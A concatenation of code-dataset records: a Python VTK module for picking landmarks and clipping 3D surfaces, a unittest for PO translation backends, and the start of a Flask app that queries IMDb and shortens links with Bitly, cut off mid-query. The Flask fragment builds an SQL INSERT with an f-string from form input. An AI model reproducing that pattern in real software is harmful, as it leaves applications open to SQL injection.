0\n\n # def left_moved(self):\n # return (self & (self.LEFT | self.MOVED)) != 0\n\n # def right_down(self):\n # return (self & self.RIGHT) != 0\n\n # def right_moved(self):\n # return (self & (self.RIGHT | self.MOVED)) != 0\n\n # def ctrl_left(self):\n # return (self & (self.LEFT | self.CTRL)) != 0\n\n # def alt_left(self):\n # return (self & (self.LEFT | self.ALT)) != 0\n\n # def ctrl_right(self):\n # return (self & (self.RIGHT | self.CTRL)) != 0\n\n # def alt_right(self):\n # return (self & (self.RIGHT | self.ALT)) != 0\n\n\nclass MODE(IntFlag):\n SELECT = enum_auto()\n _EDIT = enum_auto()\n _ADD = enum_auto()\n EDIT = SELECT | _EDIT\n ADD = SELECT | _ADD\n FREE = EDIT | ADD\n\n def allows_select(self):\n return (self & self.SELECT) != 0\n\n def allows_add(self):\n return (self & self._ADD) != 0\n\n def allows_edit(self):\n return (self & self._EDIT) != 0\n\n def allows_delete(self):\n return (self & self._ADD) != 0\n\n\nclass Window():\n\n DEFAULT_STYLE_CLASS = vtkInteractorStyleTrackballCamera\n\n\n def __init__(self):\n\n self.renderer = vtkRenderer()\n self.renderer.SetBackground(.67, .93, .93)\n\n self.render_window = vtkRenderWindow()\n self.render_window.AddRenderer(self.renderer)\n self.render_window.SetSize(960, 960)\n self.render_window.SetWindowName('')\n\n self.interactor = vtkRenderWindowInteractor()\n self.interactor.SetRenderWindow(self.render_window)\n\n self.lut = self.get_diverging_lut()\n\n return None\n\n\n def initialize(self, style=None):\n if style is None:\n style = self.DEFAULT_STYLE_CLASS()\n\n self.style = style\n # Interactor callbacks\n self.style.AddObserver('LeftButtonPressEvent', self.mouse_event)\n self.style.AddObserver('LeftButtonReleaseEvent', self.mouse_event)\n self.style.AddObserver('RightButtonPressEvent', self.mouse_event)\n self.style.AddObserver('RightButtonReleaseEvent', self.mouse_event)\n self.style.AddObserver('MouseMoveEvent', self.mouse_event)\n self.style.AddObserver('KeyPressEvent', self.key_event)\n self.style.AddObserver('KeyReleaseEvent', self.key_event)\n\n self.mouse_status = 0\n self.style.SetDefaultRenderer(self.renderer)\n self.interactor.SetInteractorStyle(self.style)\n\n return None\n\n\n\n#____________________________________________________________________#\n# start, quit, refresh, save\n\n\n def start(self):\n self.interactor.Initialize()\n self.render_window.Render()\n self.interactor.Start()\n return None\n\n\n def quit(self):\n self.render_window.Finalize()\n self.interactor.TerminateApp()\n del self.render_window, self.interactor\n\n\n def refresh(self, text=None):\n self.render_window.Render()\n\n\n def save(self):\n pass\n\n\n def save_ui(self, **kwargs):\n\n from tkinter import Tk, filedialog\n Tk().withdraw()\n \n try:\n with filedialog.asksaveasfile(**kwargs) as f:\n self.save_file(f)\n except:\n print(\"file didn't save\") \n\n\n def save_file(self, f):\n pass\n\n\n#____________________________________________________________________#\n# interaction\n\n\n def key_event(self, obj, event):\n key = obj.GetInteractor().GetKeySym()\n if event=='KeyPressEvent':\n # disable auto-repeat by monitoring held keys\n if not hasattr(self, '_keys'):\n self._keys = []\n if key in self._keys:\n return None\n else:\n print(key)\n self._keys.append(key)\n\n print('event:' + key + ' pressed')\n \n return self.key_press_event(key)\n elif event=='KeyReleaseEvent':\n if not hasattr(self, '_keys'):\n self._keys = []\n if key in self._keys:\n self._keys.remove(key)\n\n print('event:' + key + ' released')\n\n return self.key_release_event(key)\n\n\n def key_press_event(self, key):\n if key == 's' and self.interactor.GetControlKey():\n self.save()\n\n return None\n\n\n def key_release_event(self, key):\n pass\n\n\n def mouse_event(self, obj:vtkInteractorStyle, event):\n # this is to be overridden by subclass\n # should be unique for each class\n\n # check if function keys are pressed\n # the default behavior is:\n # CONTINUE THE EVENT CYCLE AS PRESSED, EVEN IF FUNCTION KEY IS RELEASE LATER\n # if this is not desirable\n # monitor the `GetControlKey` instead\n\n print(f'event:{event}')\n \n if 'PressEvent' in event: \n\n # both buttons cannot be pressed\n # one button press releases others\n if self.mouse_status & MOUSE.RIGHT:\n self.right_button_release_event()\n elif self.mouse_status & MOUSE.LEFT:\n self.left_button_release_event()\n # start of a fresh event cycle - reset mouse status\n self.mouse_status = 0\n\n # check ctrl key\n if obj.GetInteractor().GetControlKey():\n self.mouse_status |= MOUSE.CTRL\n # check alt key\n if obj.GetInteractor().GetAltKey():\n self.mouse_status |= MOUSE.ALT\n # if left button is pressed\n if event == 'LeftButtonPressEvent':\n self.mouse_status |= MOUSE.LEFT\n self.left_button_press_event()\n # if right button is pressed\n elif event == 'RightButtonPressEvent':\n self.mouse_status |= MOUSE.RIGHT\n self.right_button_press_event()\n\n elif 'ReleaseEvent' in event: # \n # if left button is released\n if event == 'LeftButtonReleaseEvent':\n self.left_button_release_event()\n # if right button is released\n if event == 'RightButtonReleaseEvent':\n self.right_button_release_event()\n # end of an event cycle - reset mouse status\n self.mouse_status = 0\n\n elif event == 'MouseMoveEvent':\n self.mouse_move_event()\n self.mouse_status = self.mouse_status | MOUSE.MOVED\n\n\n # Interactor callbacks\n\n def left_button_press_event(self):\n return self.style.OnLeftButtonDown()\n\n def left_button_release_event(self):\n return self.style.OnLeftButtonUp()\n\n def right_button_press_event(self):\n return self.style.OnRightButtonDown()\n\n def right_button_release_event(self):\n return self.style.OnRightButtonUp()\n\n def mouse_move_event(self):\n return self.style.OnMouseMove()\n\n\n#____________________________________________________________________#\n# methods\n\n @staticmethod\n def get_diverging_lut():\n \"\"\"\n See: [Diverging Color Maps for Scientific Visualization](https://www.kennethmoreland.com/color-maps/)\n start point midPoint end point\n cool to warm: 0.230, 0.299, 0.754 0.865, 0.865, 0.865 0.706, 0.016, 0.150\n purple to orange: 0.436, 0.308, 0.631 0.865, 0.865, 0.865 0.759, 0.334, 0.046\n green to purple: 0.085, 0.532, 0.201 0.865, 0.865, 0.865 0.436, 0.308, 0.631\n blue to brown: 0.217, 0.525, 0.910 0.865, 0.865, 0.865 0.677, 0.492, 0.093\n green to red: 0.085, 0.532, 0.201 0.865, 0.865, 0.865 0.758, 0.214, 0.233\n\n :return:\n \"\"\"\n ctf = vtkColorTransferFunction()\n ctf.SetColorSpaceToDiverging()\n # Cool to warm.\n ctf.AddRGBPoint(0.0, 0.230, 0.299, 0.754)\n ctf.AddRGBPoint(0.5, 0.865, 0.865, 0.865)\n ctf.AddRGBPoint(1.0, 0.706, 0.016, 0.150)\n\n table_size = 256\n lut = vtkLookupTable()\n lut.SetNumberOfTableValues(table_size)\n lut.Build()\n\n for i in range(0, table_size):\n rgba = list(ctf.GetColor(float(i) / table_size))\n rgba.append(1)\n lut.SetTableValue(i, rgba)\n\n return lut\n\n\n @staticmethod\n def get_ct_lut():\n # Define a suitable grayscale lut\n bw_lut = vtkLookupTable()\n bw_lut.SetTableRange(0, 4096)\n bw_lut.SetSaturationRange(0, 0)\n bw_lut.SetHueRange(0, 0)\n bw_lut.SetValueRange(0.2, 1)\n bw_lut.Build()\n return bw_lut\n\n\n @staticmethod\n def get_random_color():\n colors = vtkNamedColors()\n colornames = colors.GetColorNames().split('\\n')\n return colors.GetColor3d(colornames[np.random.randint(0,len(colornames))])\n\n\n def add_points(self, points:vtkPointSet, sphere_radius=1.0, color_index:np.ndarray=None, lut=None):\n\n color_array = vtkIdTypeArray()\n color_array.SetName('Color')\n if color_index is None:\n color_index = np.zeros((points.GetNumberOfPoints(),))\n \n color_index = np.asarray(color_index, dtype=np.int64)\n for i in color_index:\n color_array.InsertNextTuple((i,))\n\n points.GetPointData().AddArray(color_array)\n points.GetPointData().SetActiveScalars('Color')\n\n src = vtkSphereSource()\n src.SetRadius(sphere_radius)\n src.Update()\n\n glyph_mapper = vtkGlyph3DMapper()\n glyph_mapper.SetSourceConnection(0, src.GetOutputPort())\n glyph_mapper.SetInputData(points)\n glyph_mapper.SetScalarRange(color_index.min(), color_index.max())\n glyph_mapper.SetArrayName('Color')\n glyph_mapper.SetLookupTable(lut if lut else self.get_diverging_lut())\n glyph_mapper.Update()\n\n actor = vtkActor()\n actor.SetMapper(glyph_mapper)\n self.renderer.AddActor(actor)\n\n return actor\n\n\n\n def add_polydata(self, polyd:vtkPolyData):\n mapper = vtkPolyDataMapper()\n mapper.SetInputData(polyd)\n actor = vtkActor()\n actor.SetMapper(mapper)\n color = self.get_random_color()\n actor.GetProperty().SetColor(color)\n self.renderer.AddActor(actor)\n actor.GetProperty().EdgeVisibilityOn()\n return actor\n\n\n def add_explicit_structure_grid(self, esg:vtkExplicitStructuredGrid):\n mapper = vtkDataSetMapper()\n mapper.SetInputData(esg)\n actor = vtkActor()\n actor.GetProperty().EdgeVisibilityOn()\n color = self.get_random_color()\n actor.GetProperty().SetColor(color)\n # actor.GetProperty().SetOpacity(.5)\n actor.SetMapper(mapper)\n self.renderer.AddActor(actor)\n\n\n\n def text3d_actor(self, coords:np.ndarray, text:str):\n \n actor = vtkBillboardTextActor3D()\n actor.SetPosition(coords)\n actor.SetInput(text)\n actor.SetDisplayOffset(0,10)\n actor.GetTextProperty().SetFontSize(24)\n actor.GetTextProperty().SetColor((0,0,0))\n actor.GetTextProperty().SetJustificationToCentered()\n actor.PickableOff()\n # actor.ForceOpaqueOn()\n self.renderer.AddActor(actor)\n return actor\n\n\nclass Selector(Window):\n\n\n DEFAULT_PICKER_CLASS = vtkCellPicker\n DEFAULT_PICKER_TOLERANCE = 1e-6\n\n\n def initialize(self, picker=None):\n if picker is None:\n picker = self.DEFAULT_PICKER_CLASS()\n self.picker = picker\n self.picker.SetTolerance(self.DEFAULT_PICKER_TOLERANCE)\n self.picker.InitializePickList()\n self.picker.SetPickFromList(True)\n\n return super().initialize()\n\n \n def add_pick_polydata(self, polyd):\n \n cc = vtkCurvatures()\n cc.SetInputData(polyd)\n cc.SetCurvatureTypeToMean()\n\n mapper = vtkPolyDataMapper()\n mapper.SetInputConnection(cc.GetOutputPort())\n mapper.SetScalarModeToUsePointData()\n mapper.SetLookupTable(self.lut)\n mapper.SetScalarRange(-.5,.5)\n mapper.SetArrayName('Mean_Curvature')\n actor = vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().EdgeVisibilityOn()\n self.renderer.AddActor(actor)\n self.picker.AddPickList(actor)\n \n return actor\n\n def add_show_polydata(self, polyd):\n\n cc = vtkCurvatures()\n cc.SetInputData(polyd)\n cc.SetCurvatureTypeToMean()\n\n mapper = vtkPolyDataMapper()\n mapper.SetInputConnection(cc.GetOutputPort())\n mapper.SetScalarModeToUsePointData()\n mapper.SetLookupTable(self.lut)\n mapper.SetScalarRange(-.5,.5)\n mapper.SetArrayName('Mean_Curvature')\n actor = vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().SetOpacity(.5)\n self.renderer.AddActor(actor)\n \n return actor\n\n\n def get_pick_props(self):\n l = self.picker.GetPickList()\n props = [vtkProp.SafeDownCast(l.GetItemAsObject(i)) for i in range(l.GetNumberOfItems())]\n return props\n\n\n def get_pick_mappers(self):\n props = self.get_pick_props()\n mapps = []\n for p in props:\n act = vtkActor.SafeDownCast(p)\n if act:\n mapps.append(act.GetMapper())\n else:\n mapps.append(None)\n\n\n def get_pick_properties(self):\n props = self.get_pick_props()\n pptys = []\n for p in props:\n act = vtkActor.SafeDownCast(p)\n if act:\n pptys.append(act.GetProperty())\n else:\n pptys.append(None)\n\n\n def get_pick_polydata(self):\n return [m.GetInput() for m in self.get_pick_mappers()]\n\n\nclass PolygonalSurfacePointSelector(Selector):\n '''a simple instruction on user interactions:\n\n simple mouse click to select or deselect a point\n\n hold ctrl key and click to:\n if a point is selected, move\n if no point is selected, add a new one\n\n press \"Delete\" key to delete the current selection\n\n programmer's note:\n follow the example below\n ```\n sel = PolygonalSurfacePointSelector()\n sel.add_pick_polydata(some_vtkPolyData_instance) # add surface to pick from\n sel.initialize(\n mode=MODE.SELECT|MODE.ADD, \n named_points={'Sella'=[1,2,3],'Porion'=[4,5,6]}) # set the mode and add initial points\n self.start()\n ```\n each action (select, move, add, delete) can be enabled or disable by setting mode\n\n '''\n DEFAULT_GLYPH_COLOR = (0.8, 0.0, 0.0)\n SELECTED_GLYPH_COLOR = (0.5, 1.0, 0.5)\n\n\n def initialize(self, mode=MODE.EDIT, sphere_radius=.5, named_points={}):\n\n self.mode = mode\n self.selection_names = list(named_points.keys())\n self.selection_points = vtkPoints()\n self.current_id = None\n\n for c in named_points.values():\n self.selection_points.InsertNextPoint(*c)\n\n self.selection_points.Modified()\n \n inp = vtkPointSet()\n inp.SetPoints(self.selection_points)\n src = vtkSphereSource()\n src.SetRadius(sphere_radius)\n src.Update()\n\n # set up glyph3d\n glyph_filter = vtkGlyph3D()\n glyph_filter.SetSourceConnection(src.GetOutputPort())\n glyph_filter.SetInputData(inp)\n glyph_filter.GeneratePointIdsOn()\n glyph_filter.Update()\n\n # attach color\n self.lookup_table = vtkColorTransferFunction()\n self.lookup_table.Build()\n # self.lookup_table.IndexedLookupOn()\n for x in range(len(named_points)):\n self.lookup_table.AddRGBPoint(x,*self.DEFAULT_GLYPH_COLOR)\n\n # display these points\n mapper = vtkPolyDataMapper()\n mapper.SetInputConnection(glyph_filter.GetOutputPort())\n mapper.SetLookupTable(self.lookup_table)\n mapper.SetScalarModeToUsePointFieldData()\n mapper.SelectColorArray('InputPointIds')\n\n prop = vtkActor()\n prop.SetMapper(mapper)\n\n # set up picker for these points\n # not the same as self.picker\n # self.picker picks from the surface\n # self.glyph_picker picks from point glyphs\n self.glyph_picker = vtkCellPicker()\n self.glyph_picker.SetTolerance(self.DEFAULT_PICKER_TOLERANCE)\n self.glyph_picker.InitializePickList()\n self.glyph_picker.SetPickFromList(True)\n self.glyph_picker.AddPickList(prop)\n self.renderer.AddActor(prop)\n\n # current selection legend\n self.legend = vtkTextActor()\n self.legend.SetPosition(0,0)\n self.legend.SetInput('No Selection')\n self.legend.GetTextProperty().BoldOn()\n self.legend.GetTextProperty().SetFontSize(36)\n self.legend.GetTextProperty().SetColor(.4,0,0)\n # self.legend.GetTextProperty().SetJustificationToCentered()\n self.legend.PickableOff()\n self.renderer.AddActor(self.legend)\n\n return super().initialize()\n \n\n\n def _next_available_name(self):\n i = 1\n while str(i) in self.selection_names:\n i = i+1\n return str(i)\n\n\n def left_button_press_event(self):\n\n pos = self.style.GetInteractor().GetEventPosition()\n self.glyph_picker.Pick(pos[0], pos[1], 0, self.style.GetDefaultRenderer())\n \n # following actions are mutually exclusive\n # but for simplicity, they are not written in if-elif-else\n\n # if ctrl is not pressed, and a landmark is hit, possibly select the landmark\n if not self.interactor.GetControlKey() and self.mode.allows_select():\n\n if self.glyph_picker.GetCellId() >= 0:\n self._select()\n else:\n self._deselect()\n\n\n elif self.interactor.GetControlKey():\n # if a landmark is already selected and modification is enabled\n if self.current_id is not None and self.mode.allows_edit():\n\n # then update its location and end interaction\n self._move()\n return None\n\n # if a landmark is not selected and addition is enabled\n if self.current_id is None and self.mode.allows_add():\n\n # then add a new point and end interaction\n self._add()\n return None\n\n # continue with a normal press\n return super().left_button_press_event()\n\n\n def _select(self, id=None):\n if not self.mode.allows_select():\n return None\n \n if id is None:\n # find out which landmark it is\n ids = self.glyph_picker.GetDataSet().GetPointData().GetArray('InputPointIds')\n id = vtkIdTypeArray.SafeDownCast(ids).GetTuple(self.glyph_picker.GetPointId())[0]\n id = int(id)\n\n if self.current_id != id:\n if self.current_id is not None:\n self.lookup_table.AddRGBPoint(self.current_id, *self.DEFAULT_GLYPH_COLOR)\n\n self.lookup_table.AddRGBPoint(id, *self.SELECTED_GLYPH_COLOR)\n self.current_id = id\n\n self.legend.SetInput(self.selection_names[self.current_id])\n self.render_window.Render()\n\n return None\n\n\n def _deselect(self):\n\n if self.current_id is not None:\n self.lookup_table.AddRGBPoint(self.current_id, *self.DEFAULT_GLYPH_COLOR)\n\n self.current_id = None\n self.legend.SetInput('No Selection')\n self.render_window.Render()\n\n return None\n\n\n def _move(self):\n if self.current_id is None or not self.mode.allows_edit():\n return None\n \n pos = self.style.GetInteractor().GetEventPosition()\n self.picker.Pick(pos[0], pos[1], 0, self.style.GetDefaultRenderer())\n\n if self.picker.GetCellId() >= 0:\n self.selection_points.SetPoint(self.current_id, self.picker.GetPickPosition())\n self.selection_points.Modified()\n\n self.render_window.Render()\n\n return None\n\n\n def _add(self):\n if not self.mode.allows_add():\n return None\n pos = self.style.GetInteractor().GetEventPosition()\n self.picker.Pick(pos[0], pos[1], 0, self.style.GetDefaultRenderer())\n\n if self.picker.GetCellId() >= 0 :\n self.selection_names.append(self._next_available_name())\n self.selection_points.InsertNextPoint(self.picker.GetPickPosition())\n self.selection_points.Modified()\n self.lookup_table.AddRGBPoint(self.selection_points.GetNumberOfPoints()-1,*self.DEFAULT_GLYPH_COLOR)\n self.legend.SetInput(f'point {self.selection_names[-1]} added')\n self.render_window.Render()\n\n return None\n\n\n def _delete(self):\n if not self.mode.allows_delete() or self.current_id is None:\n return None\n \n name = self.selection_names[self.current_id]\n self.selection_points.GetData().RemoveTuple(self.current_id)\n self.selection_points.Modified()\n del self.selection_names[self.current_id]\n self.lookup_table.AddRGBPoint(self.current_id, *self.DEFAULT_GLYPH_COLOR)\n self.lookup_table.RemovePoint(self.selection_points.GetNumberOfPoints()-1)\n self.current_id = None\n self.legend.SetInput(f'{name} deleted')\n self.render_window.Render()\n return None\n \n\n def key_press_event(self, key):\n\n if key == \"Escape\":\n return self._deselect()\n\n elif key == \"Up\" or key == \"Left\" :\n if self.current_id is None and self.selection_points.GetNumberOfPoints():\n self._select(id=0)\n elif self.current_id < self.selection_points.GetNumberOfPoints()-1:\n self._select(id=self.current_id+1)\n return None\n\n elif key == \"Down\" or key == \"Right\":\n if self.current_id is None and self.selection_points.GetNumberOfPoints():\n self._select(id=self.selection_points.GetNumberOfPoints()-1)\n elif self.current_id > 0:\n self._select(id=self.current_id-1)\n return None\n\n elif key.startswith('Control'):\n if self.current_id is None and self.mode.allows_add():\n self.legend.SetInput(f'Adding Point {self._next_available_name()}')\n elif self.current_id is not None and self.mode.allows_edit():\n self.legend.SetInput(f'Moving {self.selection_names[self.current_id]}')\n self.render_window.Render()\n return None\n\n elif key == 'Delete':\n return self._delete()\n \n return super().key_press_event(key)\n\n \n def key_release_event(self, key):\n\n if key.startswith('Control'):\n if self.current_id is None:\n self.legend.SetInput('No Selection')\n elif self.current_id is not None:\n self.legend.SetInput(self.selection_names[self.current_id])\n self.render_window.Render()\n return None\n \n return super().key_release_event(key)\n\n\nclass PolygonalSurfaceNodeSelector(Selector):\n\n def initialize(self, pick_surf:vtkPolyData, other_surf:vtkPolyData=None, sphere_radius=.5):\n\n self.add_pick_polydata(pick_surf)\n if other_surf is not None:\n self.add_show_polydata(other_surf)\n\n index_id = vtkIdTypeArray()\n self.selection = index_id\n index_id.SetName('Index')\n index_id.SetNumberOfTuples(pick_surf.GetNumberOfPoints())\n index_id.SetNumberOfComponents(1)\n index_id.Fill(0)\n pick_surf.GetPointData().AddArray(index_id)\n pick_surf.GetPointData().SetActiveScalars('Index')\n\n src = vtkSphereSource()\n src.SetRadius(sphere_radius)\n src.Update()\n\n glyph_mapper = vtkGlyph3DMapper()\n glyph_mapper.SetSourceIndexArray('Index')\n glyph_mapper.SourceIndexingOn()\n glyph_mapper.SetLookupTable(self.lut)\n glyph_mapper.SetScalarRange(-.5,.5)\n self.current_id = None\n\n glyph_mapper.SetSourceData(0, vtkPolyData())\n glyph_mapper.SetSourceConnection(1, src.GetOutputPort())\n glyph_mapper.SetSourceConnection(2, src.GetOutputPort())\n glyph_mapper.SetInputData(pick_surf)\n glyph_mapper.Update()\n\n glyph_lut = vtkLookupTable()\n glyph_lut.SetNumberOfColors(3)\n glyph_lut.Build()\n glyph_lut.SetTableValue(0,[.0,.0,.0,0.0])\n glyph_lut.SetTableValue(1,[.2,.8,.2,1.0])\n glyph_lut.SetTableValue(2,[1,1,.2,1.0])\n glyph_lut.Modified()\n glyph_mapper.SetLookupTable(glyph_lut)\n glyph_mapper.SetScalarRange(0,2)\n glyph_mapper.SetArrayName('Index')\n glyph_actor = vtkActor()\n glyph_actor.SetMapper(glyph_mapper)\n \n self.renderer.AddActor(glyph_actor)\n\n super().initialize()\n\n return None\n\n\n def _hover(self):\n pos = self.style.GetInteractor().GetEventPosition()\n self.picker.Pick(pos[0], pos[1], 0, self.style.GetDefaultRenderer())\n id = self.picker.GetPointId()\n\n if id >= 0:\n\n if self.current_id is not None:\n if self.current_id == id:\n return None\n if self.selection.GetTuple(self.current_id)[0] == 2:\n self.selection.SetTuple(self.current_id, np.array([0], dtype=np.int64))\n self.current_id = None\n\n if self.selection.GetTuple(id)[0]==0:\n self.current_id = id\n self.selection.SetTuple(id, np.array([2], dtype=np.int64))\n\n self.selection.Modified()\n self.render_window.Render()\n\n return None\n \n\n def _select(self):\n\n pos = self.style.GetInteractor().GetEventPosition()\n self.picker.Pick(pos[0], pos[1], 0, self.style.GetDefaultRenderer())\n id = self.picker.GetPointId()\n if id >= 0:\n tup = self.selection.GetTuple(id)\n if tup[0] != 1:\n if tup[0] == 2: # doesn't have to, but it's nice\n self.current_id = 0\n self.selection.SetTuple(id, np.array([1], dtype=np.int64))\n self.selection.Modified()\n self.render_window.Render()\n\n return None\n \n\n def _deselect(self):\n\n self.selection.Fill(0)\n self.selection.Modified()\n self.render_window.Render()\n return None\n \n\n def _move(self):\n return None\n\n\n def left_button_press_event(self):\n\n if self.interactor.GetControlKey():\n return self._select()\n \n return super().left_button_press_event()\n\n\n def mouse_move_event(self):\n if self.interactor.GetControlKey():\n if self.mouse_status & MOUSE.LEFT:\n return self._select()\n else:\n return self._hover()\n return super().mouse_move_event()\n\n\n def key_press_event(self, key):\n\n if key == 'Escape':\n return self._deselect()\n elif key == 'space':\n return self._move()\n\n return super().key_press_event(key)\n\n\n def key_release_event(self, key):\n\n if key.startswith('Control'):\n if self.current_id is not None:\n if self.selection.GetTuple(self.current_id)[0] == 2:\n self.selection.SetTuple(self.current_id, np.array([0], dtype=np.int64))\n self.current_id = None\n self.selection.Modified()\n self.render_window.Render()\n\n return super().key_press_event(key)\n\n\nclass PolygonalSurfacePlanesClipper(Selector):\n\n '''????????????????????????????????\n counter-clockwise; port 0 - dark gray, remove; port 1 - light gray, keep\n '''\n\n def initialize(self, stl_path_or_polydata):\n\n if isinstance(stl_path_or_polydata, str):\n polyd = polydata_from_stl(stl_path_or_polydata)\n else:\n polyd = stl_path_or_polydata\n\n self.clipper = vtkClipPolyData()\n self.clipper.SetInputData(polyd)\n self.clipper.GenerateClippedOutputOn()\n self.planes_points = vtkPoints()\n self.planes_normals = vtkFloatArray()\n self.planes_normals.SetNumberOfComponents(3)\n\n mapper = vtkPolyDataMapper()\n mapper.SetInputConnection(self.clipper.GetOutputPort(0))\n actor = vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().SetColor(.4,.4,.4)\n self.renderer.AddActor(actor)\n mapper = vtkPolyDataMapper()\n mapper.SetInputConnection(self.clipper.GetOutputPort(1))\n actor = vtkActor()\n actor.SetMapper(mapper)\n self.renderer.AddActor(actor)\n\n self.planes_polyd = vtkAppendPolyData()\n self.planes_polyd.AddInputData(vtkPolyData()) # so that the program would not complain\n mapper = vtkPolyDataMapper()\n mapper.SetInputConnection(self.planes_polyd.GetOutputPort())\n actor = vtkActor()\n actor.SetMapper(mapper)\n self.renderer.AddActor(actor)\n\n self.cut()\n\n return super().initialize()\n \n\n def display_to_world(self, ij):\n coordinate = vtkCoordinate()\n coordinate.SetCoordinateSystemToDisplay()\n coordinate.SetValue(*ij, 0)\n xyz = coordinate.GetComputedWorldValue(self.renderer)\n\n return xyz\n\n\n\n def left_button_press_event(self):\n \n if self.mouse_status & MOUSE.CTRL:\n\n points = vtkPoints()\n points.InsertNextPoint(*self.display_to_world(self.interactor.GetEventPosition()))\n points.InsertNextPoint([float('nan')]*3)\n lines = vtkCellArray()\n lines.InsertNextCell(2,[0,1])\n polyd = vtkPolyData()\n polyd.SetPoints(points)\n polyd.SetLines(lines)\n mapper = vtkPolyDataMapper()\n mapper.SetInputData(polyd)\n\n self.line_actor = vtkActor()\n self.line_actor.SetMapper(mapper)\n self.line_actor.GetProperty().EdgeVisibilityOn()\n self.line_actor.GetProperty().SetColor(1,0,0)\n self.line_actor.GetProperty().SetLineWidth(2)\n \n return None\n\n # continue with a normal press\n return super().left_button_press_event()\n\n\n def mouse_move_event(self):\n\n if self.mouse_status & MOUSE.CTRL and self.mouse_status & MOUSE.LEFT :\n if not self.mouse_status & MOUSE.MOVED:\n # add line_actor upon first movement\n self.renderer.AddActor(self.line_actor)\n\n # set moving point of the line\n points = self.line_actor.GetMapper().GetInput().GetPoints()\n points.SetPoint(1,*self.display_to_world(self.interactor.GetEventPosition())) \n points.Modified()\n \n self.render_window.Render()\n\n return None\n\n # continue with a normal press\n return super().mouse_move_event()\n\n\n def left_button_release_event(self):\n \n if self.mouse_status & MOUSE.CTRL and self.mouse_status & MOUSE.LEFT:\n if self.mouse_status & MOUSE.MOVED and self.line_actor:\n \n pts = self.line_actor.GetMapper().GetInput().GetPoints() \n anchor = np.array(pts.GetPoint(0))\n moving = np.array(pts.GetPoint(1))\n self.renderer.RemoveActor(self.line_actor)\n self.line_actor = None\n\n campos = np.array(self.renderer.GetActiveCamera().GetPosition())\n normal = np.cross(moving - anchor, campos - moving)\n normal = normal/np.sum(normal**2)**.5\n bd = self.clipper.GetInput().GetBounds()\n bd = np.array(bd)+np.array([-1,1,-1,1,-1,1])*10\n plane_polyd = polydata_from_plane([*normal, -np.array(normal).dot(anchor)], bd.tolist())\n\n # add this plane\n self.planes_points.InsertNextPoint(*anchor)\n self.planes_normals.InsertNextTuple(normal.tolist())\n self.cut()\n self.planes_polyd.AddInputData(plane_polyd)\n self.planes_polyd.Update()\n self.render_window.Render()\n return None\n\n \n return super().left_button_release_event()\n\n\n \n def cut(self):\n clip_func = vtkPlanes()\n clip_func.SetPoints(self.planes_points)\n clip_func.SetNormals(self.planes_normals)\n self.clipper.SetClipFunction(clip_func)\n self.clipper.Update()\n return None\n\n\n def reset(self):\n self.planes_points.Reset()\n self.planes_normals.Reset()\n self.planes_polyd.RemoveAllInputs()\n self.planes_polyd.AddInputData(vtkPolyData())\n self.planes_polyd.Update()\n self.cut()\n\n return None\n\n\n\n def key_press_event(self, key):\n\n if key == \"Escape\":\n self.reset()\n self.render_window.Render()\n return None\n\n return super().key_press_event(key)\n\n \n\n","repo_name":"kuangts/py-scripts","sub_path":"tools/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":34427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20566164301","text":"# -*- coding: utf-8 -*-\nimport unittest\n\nimport polib\n\nfrom delia_mlg.backends import SanityBackend, ForceBackend, GlobalPOBackend, TranslationBackend\nfrom . import MockSourceBackend\n\n\nclass TestForceBackend(unittest.TestCase):\n def setUp(self):\n super(TestForceBackend, self).setUp()\n self.mock_force = MockSourceBackend()\n self.mock_global_po = MockSourceBackend()\n\n def get_backends(self):\n force_backend = ForceBackend(self.mock_force, SanityBackend())\n translation_backend = TranslationBackend(GlobalPOBackend(self.mock_global_po, SanityBackend()), SanityBackend(), force_backend)\n return force_backend, translation_backend\n\n def test(self):\n self.mock_force.add_translation('END', 'FIN')\n self.mock_global_po.add_translation('END', 'FOO')\n self.mock_force.add_translation('ALL', 'TOUS')\n self.mock_force.add_translation('FOO', 'BAR')\n self.mock_force.add_translation('FOO ', 'RABU')\n force_backend, translation_backend = self.get_backends()\n self.assertEqual('FIN', force_backend.get('END', 'en'))\n entry = polib.POEntry(msgid='END')\n self.assertTrue(translation_backend.translate_po_entry(entry, 'en'))\n self.assertEqual('FIN', entry.msgstr)\n self.assertEqual(' FIN ', force_backend.get(' END ', 'en'))\n entry = polib.POEntry(msgid=' END ')\n self.assertTrue(translation_backend.translate_po_entry(entry, 'en'))\n self.assertEqual(' FIN ', entry.msgstr)\n self.assertIsNone(force_backend.get('ALL', 'en'))\n self.assertEqual('TOUS', force_backend.get('ALL ', 'en'))\n self.assertEqual('TOUS ', force_backend.get('ALL ', 'en'))\n self.assertEqual('BAR', force_backend.get('FOO', 'en'))\n self.assertEqual(' BAR', force_backend.get(' FOO', 'en'))\n self.assertEqual('RABU', force_backend.get('FOO ', 'en'))\n self.assertEqual(' RABU', force_backend.get(' FOO ', 'en'))\n self.assertEqual('RABU ', force_backend.get('FOO ', 'en'))\n self.assertEqual(' RABU ', force_backend.get(' FOO ', 'en'))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"azizlahmedi/iadev3.0","sub_path":"venv/lib/python3.11/site-packages/delia_mlg_tests/test_force_backend.py","file_name":"test_force_backend.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4611099203","text":"import sqlite3\nfrom sqlite3 import Error\nimport requests\nfrom flask import Flask, request, render_template, url_for, redirect\nimport json\nfrom flaskd.config import Config\n\napp = Flask(__name__)\ndb_file = r\"IMDb.db\"\n\nIMDbKey = Config.IMDbKey\naccess_token = Config.BitlyAT\nguid = Config.BitlyGuid\nheaders = {\"Authorization\": f\"Bearer {access_token}\"}\n\ndef create_connection():\n cnxn = None\n try:\n cnxn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n return cnxn\n\n@app.route('/create1', methods =[\"GET\", \"POST\"])\ndef create1():\n if request.method == 'POST':\n IMDbID = request.form['IMDbID']\n title = request.form['title']\n poster = request.form['poster']\n releaseDate = request.form['description']\n shorten_res = requests.post(\"https://api-ssl.bitly.com/v4/shorten\", json={\"group_guid\": guid, \"long_url\": poster}, headers=headers)\n link = shorten_res.json().get(\"link\")\n\n query = f\"INSERT INTO Media 